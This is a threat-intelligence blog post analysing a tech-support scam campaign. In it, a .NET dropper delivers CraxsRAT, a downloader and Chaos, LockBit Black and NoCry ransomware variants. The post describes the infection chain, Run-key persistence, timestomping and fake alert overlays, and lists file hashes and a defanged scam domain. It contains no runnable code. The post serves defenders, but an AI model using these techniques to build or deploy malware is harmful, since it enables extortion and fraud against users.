Cyber Security Blogs
This blog sheds light on a new Tech Scam wherein scammers employ deceptive tactics to lure users into paying for non-existent antivirus solutions.
Uncovering Tech Scammers possible involvement in different ransomware attacks.
The IP address of a domain used in this scam is associated with both the TORZON MARKETPLACE, a DarkWeb marketplace, and the “Chai Urgent Care” phishing campaign.
A fake LinkedIn talent acquisition profile was also discovered, utilizing a fabricated persona found on the phishing site.
Overview Tech scams involve fraudulent online activities where scammers deceive users by convincing them that their computer or device has issues, subsequently charging them for unnecessary technical support or services. These scammers often employ executable files as a means of perpetrating their schemes. For instance, they might send emails or messages containing phishing links or attachments disguised to appear legitimate but actually contain malicious software. This malicious application primarily generates fake pop-ups or messages, pressuring users into paying for supposed technical support or services. Cyble Research and Intelligence Labs (CRIL) have reported on multiple tech scams in the past; here are some of the notable ones:
https://cyble.com/blog/massive-tech-support-scam-exposed/
https://cyble.com/blog/blue-screen-of-death-scams-target-users-visiting-fake-adult-sites/
CRIL has recently observed a new Tech Scam campaign. One instance involved scammers setting up a non-existent antivirus solution site to deceive users into paying for non-existent services. During our analysis, we encountered various ransomware variants leveraged by tech scammers to propagate their fraudulent schemes. A thorough investigation into the phishing site associated with this campaign revealed that its IP address has a history of involvement in various scam campaigns and is even associated with a DarkWeb marketplace. Campaign Analysis CRIL uncovered a dropper responsible for distributing several malware payloads, namely CraxsRAT, a Downloader, and a variant of Chaos ransomware. This downloader and ransomware are utilized to propagate Tech Scams. The downloader proceeds to download four additional payloads. Upon execution, each of these payloads is utilized to propagate the deceptive AntiVirus website. The figure below shows the infection chain. Figure 1 – Infection Chain Initial Dropper The dropper is a 32-bit .Net executable (SHA256: fbb8f0231c666f7b1bfb9256b60b73bc3f44779eb2865b040ca01a3d0a4e1140). The dropper contains three embedded payloads within its Resources, as depicted in the figure below. When executed, the dropper employs Gzip decompression to extract these payloads, which are then placed in the %temp% directory and subsequently executed. Figure 2 – Embedded Payloads Following are the details of the payloads.
Payload Name
Malware
Yotgnbkedhvtxc.exe
CraxsRAT
Vippqmccfq.exe
Downloader
Pwdsueslxagy.exe
Variant of chaos ransomware
Vippqmccfq.exe -Downloader This file is a .Net downloader (sha256: 0860a8f9d5debc37dc997a501c593b0eb5f17d5e4ec27e41bec09c606309c0a5). It retrieves a batch script from Resources. It then places this file in the %temp% folder, naming it “Gwpuae.bat.” The following illustration presents the code responsible for dropping and subsequently running the batch file. Figure 3 – Drops Batch Script This batch script downloads additional payloads from a typosquatted domain hosted on GitHub pages and saves them to the %AppData% directory. The figure below shows the commands used by the batch script to download additional payloads. Figure 4 – Downloads Additional Payloads This batch script attempts to download four payloads, such as Microsoft Services.exe, System.exe, Runtime Broker.exe, and windows.exe, from the same hosting site and executes them. All of these executables point to the same non-existent antivirus site (www[.]bit[.]lysecure-net) and telegram handle (@securenet_global). Microsoft Services.exe: Tech Scam Executable This file is a 32-bit binary and uses TimeStomping; an anti-forensic technique. (SHA256: d79f5fe23a82b67205037c268f2fed92d727bf4215b20fa21c8a765e20661362) Upon execution, this file will overlay a warning message on the victim’s desktop, as depicted in the figure below. The design of this alert is intentionally crafted to prevent the user from closing it or accessing other applications on their system. However, it’s crucial to note that this message is a deceptive alert. The warning prompts users to visit a specific website or contact someone via Telegram, likely with malicious intentions. Figure 5 – Alert Message This executable also uses persistence by making an entry to the “SOFTWARE\Microsoft\Windows\CurrentVersion\Run” key. So, it will automatically execute this file when a user logs in or restart the system. The figure below shows the code for persistence. Figure 6 – Establishing Persistence System.exe: Chaos ransomware variant This file (SHA256: c14ba9911b3d9f3f85a600f84538c9ee90dbd627ec3831bb89745a71bc0db16b) is a variant of Chaos ransomware. CRIL has reported on multiple variants of Chaos ransomware in the past; a few of them can be found below:
https://cyble.com/blog/blacksnake-ransomware-emerges-from-chaos-ransomwares-shadow/
https://cyble.com/blog/obsidian-orb-ransomware-demands-gift-cards-as-payment/
https://cyble.com/blog/unveiling-wagner-groups-cyber-recruitment/
Upon execution, the ransomware encrypts files and alters their names by adding the “.encp” extension. Additionally, it drops a ransom note named “READ_ME.txt.” The scammer customizes the ransomware binary and steers victims toward the fraudulent antivirus website, as shown below. Figure 7 – Chaos Ransomware variantRuntime Broker.exe: LockBit Black Ransomware Variant The specified file (SHA256: b38943f777ec2cb42abe5ef35b5d2933ce65e3aa3915d7d62bc1cd75c7586886) is identified as a variant of the LockBit Black ransomware. This variant seems to have been generated using the leaked LockBit Black builder from 2022. The illustration below displays both the ransom note and the wallpaper that this strain of ransomware has employed. Figure 8 – Variant of LockBit Black Ransomwarewindows.exe: Downloader of NoCry ransomware variant This file (SHA256: f6eaa0d761f364d68443445b43ee4ebf722af3e65319c26bf136cda50a532685) is a .Net downloader. Upon execution, it drops a batch script named “Jdomsoqo.bat” in the %temp% directory and executes it. The figure below shows the code for dropping and executing the batch script. Figure 9 – Drops a Batch Script This batch script further downloads a ransomware payload named “Start.exe” using a PowerShell command and saves it in the “AppData” directory. The figure below shows the content of the batch script. Figure 10 – Content of Batch Script This ransomware binary “Start.exe” is a variant of NoCry ransomware. (SHA256: 521357a0f9669de4a9233feeef7a3c5299c51de4a2531c56aacc807c0fd25a6a ). The figure below shows the ransom note content in the binary’s resource section. Figure 11 – Ransom Note Content Upon execution, this ransomware encrypts files and renames them using the “.recry” extension. It further changes the desktop background, as shown in the Figure below, and displays the ransom note using .Net forms.
